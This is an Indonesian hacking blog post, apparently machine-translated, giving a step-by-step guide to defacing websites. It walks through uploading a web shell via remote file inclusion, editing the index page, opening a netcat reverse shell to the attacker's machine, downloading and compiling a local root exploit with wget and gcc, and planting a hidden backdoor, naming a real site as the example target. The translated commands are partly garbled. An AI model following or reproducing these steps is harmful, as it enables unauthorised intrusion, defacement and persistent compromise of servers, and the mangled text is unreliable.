Disclaimer: Metode dan meng-upload shell ditunjukkan dalam tutorial ini telah dicoba pada situs hack, sehingga hackingalert tidak bertanggung jawab atas kerusakan apapun.
Lengkapi panduan untuk mengotori website - Cookbook! - Halo Sobat Kayuagung-Cyber :) Selamat malam. Maaf yah kalo postingan kali ini acak acakan, admin cuma mau berbagi sesuatu Artikel Hacking menarik yang didapat dari luar, dan admin terjemahkan disini :) Maaf kalo ada kata-kata yang salah. Selamat Membaca dan smoga bermanfaat
Panduan lengkap untuk hack sebuah website.
Hacking server situs / web - Panduan Langkah 3.
Beberapa di FAQ yang perlu anda ketahui tentang hacking.
Untuk hal-hal lain Anda dapat menyimpan googling sambil Anda melanjutkan dengan artikel. Seperti Anda dapat menemukan banyak materi yang terkait dengan Sql injeksi , XSS , validasi input , inklusi file jarak jauh dll Berikut saya akan menunjukkan pendekatan praktis untuk hacks ini.
Mari kita mulai. Di sini saya akan menjelaskan cara untuk deface situs setelah Anda telah menemukan sebuah situs yang rentan.
Dalam kasus Anda masih bertanya-tanya bahwa cara untuk menemukan kerentanan maka anda harus berhenti di sini dan sikat keterampilan Anda.
Misalkan Anda berhasil menemukan kerentanan di perticular sebuah website seperti sql saya, RFI, XSS dll. Jadi pertanyaannya sekarang adalah bagaimana terletak Anda akan lebih meningkatkan serangan Anda.
Jawabannya terletak dalam loading shell. Ini akan membuat tugas Anda untuk mendapatkan hak administratif sangat mudah.
Misalnya anda berhasil menemukan inklusi kerentanan Remote file dalam sebuah situs web dan Anda berhasil meng-upload shell. Anda dapat memilih rasa shell seperti C99, c57 dll
Pertimbangkan ini contoh myburraq.com . Website ini telah rusak dengan menggunakan injeksi SQL dan shell telah di-upload. Dalam kasus Anda mengalami masalah dengan dasar-dasar shell.
Setelah Anda telah menemukan bahwa situs tersebut rentan, Anda sekarang dapat melanjutkan untuk meng-upload shell.
Pertama upload shell pada web server bebas / file hosting layanan di internet yang akan memberikan link langsung untuk itu, atau Anda juga bisa langsung meng-upload tergantung pada jenis serangan yang Anda pilih.
Shell adalah software yang menyediakan antarmuka bagi pengguna dari suatu sistem operasi yang menyediakan akses ke layanan dari kernel.
Oleh karena itu sekali shell Anda adalah membuat dan menjalankan Anda bisa mendapatkan akses ke berbagai file pada server
Shell upload terlihat mirip dengan yang ada di gambar ini (klik pada gambar untuk memperbesar):
Jika Anda melihat address bar di sini maka Anda akan memiliki gagasan tentang bagaimana saya upload shell untuk situs ini menggunakan inklusi file jarak jauh.
Anda akan menemukan berbagai tab di bagian atas jendela ini shell. Sekarang tugas kita adalah deface website (yang sudah dilakukan). Jadi sekarang pindah ke bagian file manager dari shell ini. Klik pada tab File. Anda akan melihat sesuatu seperti ini:
Di sini Anda akan menemukan semua file yang terkait dengan halaman web.
Jadi sekarang untuk deface halaman utama website ini anda harus mencari nama file dari jenis atau index.html index.php atau dll index.aspx. Umumnya ini adalah jenis umum dari nama file untuk halaman rumah situs web apapun.
Setelah Anda mengetahui halaman rumah, pilih dan klik tombol edit.
Sekarang Anda dapat mengedit html sesuai dengan cara Anda ingin dan posting berkilauan Anda "hacked", poster di sekeliling. Setelah Anda menyimpannya, Anda selesai dengan defacing.
Tapi perjuangan tidak berakhir di sini.
apa selanjutnya. Cara menggunakan server ini untuk eksplorasi lebih lanjut seperti mendapatkan akses root, menyiapkan backdoor dll
Mari kita bekerja pada untuk mendapatkan akses root.
Pindah ke bagian Jaringan shell anda.
Anda akan menemukan opsi untuk kembali terhubung.
Tapi sebelum Anda dapat kembali menghubungkan mesin dengan shell Anda harus download dari internet Netcat (google keluar). Unzip netcat di drive C dan lulus perintah berikut di command prompt Anda - c:> nc-l-n-v-p PORT PORT mana adalah nomor port di mana Anda ingin meneruskan koneksi Anda. Mari kita membuatnya 1212.
command prompt Anda akan terlihat somthing seperti ini:
Sekarang kembali ke shell anda dan mengkonfigurasi punggung Anda - pilihan koneksi. Masukkan alamat ip dan nomor port 1212 sehingga dapat terhubung kembali ke mesin Anda.
Command prompt Anda kemudian akan daftar yang Anda terhubung ke shell dan siap untuk menerima perintah Anda.
Jadi sekarang mari kita beralih ke root server.
Pertama, anda harus mencari versi kernel di target Anda.
ketik perintah berikut di prompt perintah: uname-a
Ini akan memberitahu Anda berbagai versi kernel, php, FTP dll tersedia di server.
Langkah berikutnya adalah untuk menemukan exploit root lokal untuk versi perticular kernel. Dalam kasus saya ini adalah kernel 2.6.18.
Jadi saya menemukan sebuah exploit (google atau pergi ke miliw0rm) meng-upload di server web gratis saya dan mendapatkan link.
Dalam kasus, saya memanfaatkan adalah 17439.c. Jadi setelah meng-upload di server web gratis saya (saya lebih memilih 110mb.com), saya akan harus mendapatkannya upload dalam korban saya juga.
Lanjutkan dengan perintah berikut di command prompt Anda: http://myserver.com/ wget 17439.c mana myserver.com adalah file server hosting saya. command prompt Anda akan terlihat sesuatu seperti ini
Setelah Anda selesai dengan bagian upload, sekarang Anda akan perlu melakukan kompilasi dengan mengetikkan perintah berikut: gcc-o 17439.c 17.439 (lihat gambar)
Setelah kompilasi berhasil mengeksploitasi Anda akan memiliki hak istimewa root server dan Anda bisa jauh lebih merusak sekarang.
Prosedur serupa sekarang dapat digunakan untuk menyembunyikan backdoor dengan meng-upload itu pada mesin dan karena Anda memiliki hak istimewa root sekarang sehingga Anda dapat lebih membuat backdoor menyembunyikan suatu tempat di dalam yang dapat bertindak sebagai titik masuk permanen Anda ke server.
Ada banyak hal untuk mengeksplorasi lebih lanjut witth ini. Saya sangat akan menyarankan Anda semua untuk tidak pernah deface sebuah website, melainkan berusaha dan membantu mereka dalam memperbaiki masalah, menjaga pekerjaan Anda di sisi konstruktif.
Jika anda memiliki keraguan tentang posting ini maka jangan ragu untuk menambahkan komentar Anda di sini. UPDATE - Website yang dijelaskan dalam tutorial ini sedang down seperti yang dirusak (bukan oleh saya ofcourse) tapi proses dasar tetap sama untuk setiap situs web yang rentan.
Kayuagung-Cyber :)
0 comments:
Post a Comment